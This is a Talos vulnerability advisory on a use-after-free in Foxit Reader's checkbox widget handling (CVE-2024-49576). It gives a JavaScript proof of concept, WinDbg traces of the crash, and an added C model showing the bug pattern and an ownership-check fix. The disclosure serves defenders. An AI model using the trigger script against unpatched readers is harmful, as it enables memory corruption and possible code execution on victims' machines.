Talos Vulnerability Report

TALOS-2024-2093

Foxit Reader Checkbox Calculate CBF_Widget Use-After-Free Vulnerability

December 18, 2024
CVE Number

CVE-2024-49576

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a checkbox CBF_Widget object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site when the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2024.3.0.26795

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that change in response to user input or events. A use-after-free vulnerability exists in the way Foxit Reader handles a checkbox object, as illustrated by the following proof-of-concept code:

function main() {
    // Create the checkbox field "AA" (page index 2).
    app.activeDocs[0].addField("AA", "checkbox", 2, [17,0,5,14]);
    app.activeDocs[0].getField("AA").defaultIsChecked(0);
    // Assign delete_page() as the Calculate action of the text field "txt3".
    getField("txt3").setAction("Calculate", 'delete_page();');
    // The second addField triggers the Calculate event, so delete_page()
    // runs while addField still holds the checkbox's CBF_Widget object.
    app.activeDocs[0].addField("AA", "checkbox", 0, [17,0,5,14]);
}

function delete_page() {
    // deletePages() frees the objects associated with the page,
    // including the checkbox widget created by addField.
    app.activeDocs[0].deletePages();
    app.activeDocs[0].deletePages();
}

The above code creates a checkbox field object. A callback function is assigned to the Calculate event of the text field txt3, and that event is promptly triggered by the second call to addField. The action callback does nothing but call deletePages, which in turn frees all the objects associated with a page. The use-after-free occurs because the checkbox object is freed by deletePages() and is then used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
eax=0058e4c0 ebx=0058e52c ecx=030d4520 edx=00000002 esi=118dc2f8 edi=118dc2b8
eip=03413e79 esp=0058e498 ebp=0058e4d8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x1265300 (030d4520)}
0:000> g
eax=0058e4b8 ebx=0058e524 ecx=0306d8f0 edx=00000002 esi=11854e98 edi=13c387f8
eip=03413e79 esp=0058e490 ebp=0058e4d0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11fe6d0 (0306d8f0)} <----------------- (1)

[...]
0:000> p
eax=190bfe00 ebx=190bfe00 ecx=190bfe00 edx=00000009 esi=00000000 edi=190aa4a0
eip=01e3bc2f esp=0058e0bc ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7af:
01e3bc2f 6a64            push    64h                                           
0:000> p
eax=190bfe00 ebx=190bfe00 ecx=190bfe00 edx=00000009 esi=00000000 edi=190aa4a0
eip=01e3bc31 esp=0058e0b8 ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7b1:
01e3bc31 e8c0225d02      call    FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5e1da6 (0440def6) ; <----------------- (2)
0:000> p
eax=15df3bd8 ebx=190bfe00 ecx=00000064 edx=00000002 esi=00000000 edi=190aa4a0
eip=01e3bc36 esp=0058e0b8 ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7b6:
01e3bc36 83c404          add     esp,4
0:000> dd eax                                                ; <----------------- (3)
15df3bd8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3be8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3bf8  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c08  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c18  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c28  e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
15df3c38  e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> pc
eax=15df3bd8 ebx=190bfe00 ecx=15df3bd8 edx=00000002 esi=00000000 edi=190aa4a0
eip=01e3bc53 esp=0058e0ac ebp=0058e0e8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!CryptUIWizExport+0xa7f7d3:
01e3bc53 e8585bfeff      call    FoxitPDFReader!CryptUIWizExport+0xa65330 (01e217b0)  ; <----------------- (4)
0:000> p
eax=15df3bd8 ebx=190bfe00 ecx=6f99f4b3 edx=00000000 esi=00000000 edi=190aa4a0
eip=01e3bc58 esp=0058e0bc ebp=0058e0e8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
FoxitPDFReader!CryptUIWizExport+0xa7f7d8:
01e3bc58 8bf0            mov     esi,eax
0:000> dd eax                                               ; <----------------- (5)
15df3bd8  04e9687c 11884ab0 190989e0 1379b8b8
15df3be8  e0e0e000 ffffffff 00000000 01000101
15df3bf8  00000004 00000000 10d478a0 00000000
15df3c08  117de4f4 190aa4a0 139953b8 00000000
15df3c18  00000000 00000000 00000000 00000000
15df3c28  00000000 e0e0e000 00000000 00000000
15df3c38  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6

At (1), the javascript::CFXJS_Document::addField_static method associated with the JavaScript API addField() is called. The call at (2) creates the vulnerable CBF_Widget object with a size of 0x64. The vulnerable buffer can be examined at (3). The CBF_Widget object is initialized by the call at (4), and its value after initialization can be observed at (5).

0:000> g
eax=0058da28 ebx=0058da94 ecx=0306eef0 edx=00000002 esi=1186d4c0 edi=1186d480
eip=03413e79 esp=0058da00 ebp=0058da40 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)} ; <----------------- (6)

[...]
0:000> p
eax=15ae5a70 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=15ae5a60
eip=00c0a4ba esp=0058d868 ebp=0058d870 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb51a:
00c0a4ba 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=0058d88c
0:000> pc
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0a4ea esp=0058d848 ebp=0058d870 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb54a:
00c0a4ea e871350000      call    FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeeac0 (00c0da60) ; <----------------- (7)
[...]
0:000> p
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0da6a esp=0058d838 ebp=0058d840 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeeaca:
00c0da6a 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:0053:00000000=0058d864
0:000> p
eax=0058d864 ebx=1187bbf0 ecx=1187bbf0 edx=00000001 esi=13d341e8 edi=1187bbf0
eip=00c0da70 esp=0058d838 ebp=0058d840 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeead0:
00c0da70 50              push    eax
0:000> g
before free
eax=10d8e2f4 ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df7f esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefdf:
00c0df7f 8b01            mov     eax,dword ptr [ecx]  ds:002b:15df3bd8=04e9687c
0:000> t
eax=04e9687c ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df81 esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe1:
00c0df81 6a01            push    1
0:000> t
eax=04e9687c ebx=10d8e2f4 ecx=15df3bd8 edx=00c16690 esi=10d8e2f4 edi=1187bbf0
eip=00c0df83 esp=0058b40c ebp=0058d840 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe3:
00c0df83 ff5004          call    dword ptr [eax+4]    ds:002b:04e96880=01e21c10 ; <----------------- (8)
0:000> dd 15df3bd8                           ; <----------------------------------- (9)
15df3bd8  04e9687c 11884ab0 190989e0 1379b8b8
15df3be8  e0e0e000 00000001 117de598 01000101
15df3bf8  00000004 00000000 10d478a0 00000000
15df3c08  117de4f4 190aa4a0 139953b8 00000000
15df3c18  00000000 00000000 00000000 00000000
15df3c28  00000000 e0e0e000 00000000 00000000
15df3c38  00000000 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> p
eax=15df3bd8 ebx=10d8e2f4 ecx=15df3bd8 edx=00000001 esi=10d8e2f4 edi=1187bbf0
eip=00c0df86 esp=0058b410 ebp=0058d840 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeefe6:
00c0df86 8b4728          mov     eax,dword ptr [edi+28h] ds:002b:1187bc18=10d8e2f4
0:000> dd 15df3bd8                            ; <----------------------------------- (10)
15df3bd8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3be8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3bf8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c08  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c18  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c28  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c38  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6

At (6), the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. It calls CReader_Page::ClearAnnotData at (7), which frees a number of objects. This method invokes free at (8) on the vulnerable buffer. The value of the vulnerable object is examined at (9) and (10), showing the value before and after the free function is called. The vulnerable object is later used without any validation, which can be observed in a debugger at the time of the crash.

0:000> g
eax=0058e224 ebx=0058e384 ecx=00000000 edx=190a18dc esi=15df3bd8 edi=190bfe00
eip=01e23947 esp=0058e1f4 ebp=0058e254 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!CryptUIWizExport+0xa674c7:
01e23947 8d4e04          lea     ecx,[esi+4]
0:000> dd esi                        <-------------------------------  (11)
15df3bd8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3be8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3bf8  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c08  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c18  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c28  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
15df3c38  f0f0f0f0 a0a0a0a0 a0a0a0a0 f0f0f0f0
15df3c48  00000000 00000000 ea1887a1 0065fda6
0:000> p
eax=0058e224 ebx=0058e384 ecx=15df3bdc edx=190a18dc esi=15df3bd8 edi=190bfe00
eip=01e2394a esp=0058e1f4 ebp=0058e254 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!CryptUIWizExport+0xa674ca:
01e2394a e8914bdcfe      call    FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc9540 (00be84e0)
0:000> p
(1c34.1c2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=0058e384 ecx=00000001 edx=f0f0f0f4 esi=0058e224 edi=190bfe00
eip=00be853b esp=0058e1d4 ebp=0058e1ec iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010282
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b:
00be853b f00fc10a        lock xadd dword ptr [edx],ecx ds:002b:f0f0f0f4=????????  <----------------- (12)
0:000> u
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b:
00be853b f00fc10a        lock xadd dword ptr [edx],ecx
00be853f 8bc6            mov     eax,esi
00be8541 8b4df4          mov     ecx,dword ptr [ebp-0Ch]
00be8544 64890d00000000  mov     dword ptr fs:[0],ecx
00be854b 59              pop     ecx
00be854c 5e              pop     esi
00be854d 8be5            mov     esp,ebp
00be854f 5d              pop     ebp
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058e1ec 01e2394f     0058e224 6f99f643 137fb1f0 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xc959b
01 0058e254 013f219e     0058e101 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0xa674cf
02 0058e2a0 030e6db0     0058e278 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0x35d1e
03 0058e370 030a2024     1908f320 0058e390 02431dd1 FoxitPDFReader!safe_vsnprintf+0x1277b90
04 0058e434 0306da42     13c387f8 0058e4b0 0058e45c FoxitPDFReader!safe_vsnprintf+0x1232e04
05 0058e488 03413e7b     13c387f8 0058e4b8 0058e4b0 FoxitPDFReader!safe_vsnprintf+0x11fe822
06 0058e4d0 035f824b     16313028 21f28cb5 16313028 FoxitPDFReader!FXJSE_GetClass+0x26b
07 0058e538 035f7a0e     0058e580 21f28cb5 0058e65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cbb
08 0058e5cc 035f7cc5     0058e5fc 16313028 0058e65c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e347e
09 0058e614 035f7b4b     0058e62c 00000009 0058e678 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3735
0a 0058e630 038199db     00000009 0058e678 16313028 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35bb
0b 0058e650 037b5a39     208c2339 113cfcad 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40544b
0c 0058e6a8 037b5a39     113d4365 113e49d9 113e4a2d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14a9
0d 0058e6d4 037b40c0     113d4365 208c21b1 113e49d9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a14a9
0e 0058e6ec 037b3ee9     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fb30
0f 0058e718 034506ee     16313028 208c2339 113e49d9 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f959
10 0058e828 03450202     0058e9bc 16313028 0058e884 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c15e
11 0058e8b0 03438f04     0058e9bc 16313028 137abeb4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc72
12 0058ea60 03438a00     0058eafc 137abedc 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24974
13 0058ea74 034123ef     0058eafc 137abedc 6f99fefb FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24470
14 0058eaec 03412d26     137abeb4 15e60278 137abea0 FoxitPDFReader!FXJSE_Runtime_Release+0xfaf
15 0058eb28 030104c4     13b3f310 15589a1c 15e60278 FoxitPDFReader!FXJSE_ExecuteScript+0x86
16 0058eb8c 030113b0     00000000 0058ec18 0058ebc0 FoxitPDFReader!safe_vsnprintf+0x11a12a4
17 0058eba0 012170cf     0058ec18 0058ebc0 6f99ffc7 FoxitPDFReader!safe_vsnprintf+0x11a2190
18 0058ebd0 01215d04     10d1fe40 00000015 0058ebf8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c91ef
19 0058ec10 01214530     190a5020 163bff08 13b18a08 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c7e24
1a 0058ec64 00afcdd2     0058ec94 163bff08 13b18a08 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c6650
1b 0058ecb4 00d8271b     00000001 6f99eccf 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7802
1c 0058f8d8 0441bcd4     00000001 00000000 6f99edbf FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6c53b
1d 0058f9a8 0441cead     00000429 00000001 00000000 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5efb84
1e 0058f9cc 04417853     00000429 00000001 00000000 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5f0d5d
1f 0058fa40 044180c6     13bbf520 0003055a 00000429 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5eb703
20 0058fa60 7552171b     0003055a 00000429 00000001 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5ebf76
21 0058fa8c 75517e8a     04418092 0003055a 00000429 USER32!_InternalCallWinProc+0x2b
22 0058fb74 755167c1     04418092 00000000 00000429 USER32!UserCallWinProcCheckWow+0x33a
23 0058fbf0 755162e0     00000329 0058fc18 00d034e4 USER32!DispatchMessageWorker+0x4d1
24 0058fbfc 00d034e4     0c5e9b48 0c5e9b48 05f69798 USER32!DispatchMessageW+0x10
25 0058fc18 00d035a3     05f69798 00d03510 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4544
26 0058fc38 0484a70a     00000000 05f956ac 002d3000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4603
27 0058fc50 045ff41a     00910000 00000000 0c5853c4 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa1e5ba
28 0058fc9c 74fbfcc9     002d3000 74fbfcb0 0058fd08 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7d32ca
29 0058fcac 770a809e     002d3000 e4cdb485 00000000 KERNEL32!BaseThreadInitThunk+0x19
2a 0058fd08 770a806e     ffffffff 770c910a 00000000 ntdll!__RtlUserThreadStart+0x2f
2b 0058fd18 00000000     045ff4e9 002d3000 00000000 ntdll!_RtlUserThreadStart+0x1b

At (11) above, esi still holds the same pointer (15df3bd8), which now belongs to a freed allocation. The crash occurs at (12) when the freed region is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to obtain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

Please note that this vulnerability is a patch bypass of TALOS-2024-1967.
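The pattern behind this bug is a script-controlled callback that runs while native code still holds a pointer to an object the callback is allowed to free. The following C model is an added illustration of that pattern and of the validation step that was missing; it is not Foxit code and not part of the Talos report. All names (Widget, Document, doc_owns, add_field_vulnerable, add_field_hardened, run_poc) are hypothetical. Freed widgets are filled with 0xF0 and kept in a quarantine instead of being returned to malloc, which mimics the PageHeap fill seen in the debugger output above and keeps the stale read well defined for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added model of the bug class, not Foxit code; all names are hypothetical. */
#define MAX_WIDGETS    8
#define QUARANTINE_CAP 64
#define POISON_BYTE    0xF0           /* PageHeap-style fill for freed memory */
#define WIDGET_MAGIC   0x57494447u    /* "WIDG", valid only while the object is live */

typedef struct Widget {
    uint32_t magic;
    int      field_type;              /* e.g. checkbox */
    int      is_checked;
} Widget;

typedef struct Document {
    Widget *widgets[MAX_WIDGETS];     /* page-owned widgets */
    int     n_widgets;
    void  (*calculate_action)(struct Document *);   /* document-supplied action */
} Document;

/* Freed blocks are poisoned and parked here so a stale read is observable
 * without undefined behaviour in this demo. */
static Widget *quarantine[QUARANTINE_CAP];
static int     n_quarantine;

static void widget_free(Widget *w) {
    memset(w, POISON_BYTE, sizeof *w);
    if (n_quarantine >= QUARANTINE_CAP) abort();
    quarantine[n_quarantine++] = w;   /* never handed back to malloc here */
}

/* Model of deletePages(): releases every widget owned by the page. */
void doc_delete_pages(Document *d) {
    for (int i = 0; i < d->n_widgets; i++) {
        widget_free(d->widgets[i]);
        d->widgets[i] = NULL;
    }
    d->n_widgets = 0;
}

static Widget *widget_new(Document *d, int field_type) {
    if (d->n_widgets == MAX_WIDGETS) abort();
    Widget *w = calloc(1, sizeof *w);
    if (!w) abort();
    w->magic = WIDGET_MAGIC;
    w->field_type = field_type;
    d->widgets[d->n_widgets++] = w;
    return w;
}

/* Ownership check: is `w` still one of the document's live widgets? */
static int doc_owns(const Document *d, const Widget *w) {
    for (int i = 0; i < d->n_widgets; i++)
        if (d->widgets[i] == w) return 1;
    return 0;
}

static void run_calculate(Document *d) {
    if (d->calculate_action) d->calculate_action(d);
}

/* Vulnerable addField(): runs the Calculate action while still holding `w`,
 * then uses `w` without checking whether the page still owns it.
 * Returns the magic it read; 0xF0F0F0F0 means it read freed memory. */
uint32_t add_field_vulnerable(Document *d, int field_type) {
    Widget *w = widget_new(d, field_type);
    run_calculate(d);                 /* may call doc_delete_pages() */
    w->is_checked = 1;                /* use after free if the page was deleted */
    return w->magic;
}

/* Hardened addField(): after any script-controlled callback, re-validate the
 * object against its owner before touching it. Returns 0 if it is gone. */
uint32_t add_field_hardened(Document *d, int field_type) {
    Widget *w = widget_new(d, field_type);
    run_calculate(d);
    if (!doc_owns(d, w)) return 0;    /* freed by the action: do not use it */
    w->is_checked = 1;
    return w->magic;
}

/* Mirrors the PoC's delete_page(): two deletePages() calls. */
static void delete_page_action(Document *d) {
    doc_delete_pages(d);
    doc_delete_pages(d);
}

/* Mirrors the PoC's main(): a first field, a Calculate action, and a second
 * addField that fires the action. Returns what the chosen variant read. */
uint32_t run_poc(int hardened) {
    Document d = {0};
    add_field_hardened(&d, 2);                 /* first addField, no action yet */
    d.calculate_action = delete_page_action;   /* setAction("Calculate", ...) */
    return hardened ? add_field_hardened(&d, 0) : add_field_vulnerable(&d, 0);
}

int main(void) {
    printf("vulnerable addField read 0x%08x (poisoned freed memory)\n", (unsigned)run_poc(0));
    printf("hardened   addField read 0x%08x (widget no longer owned)\n", (unsigned)run_poc(1));
    return 0;
}
```

The vulnerable variant reports 0xF0F0F0F0, the same fill pattern that the dd output at (10) and (11) shows for the freed CBF_Widget, while the hardened variant detects that the owning page released the widget during the callback and stops before touching it. In a real engine the ownership check is usually a weak reference or generation counter rather than a linear scan, but the principle is the same: any pointer held across a script-visible callback must be re-validated before use.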

TIMELINE

2024-10-17 - Vendor Disclosure
2024-12-17 - Vendor Patch Release
2024-12-18 - Public Release

Credit

Discovered by KPC of Cisco Talos.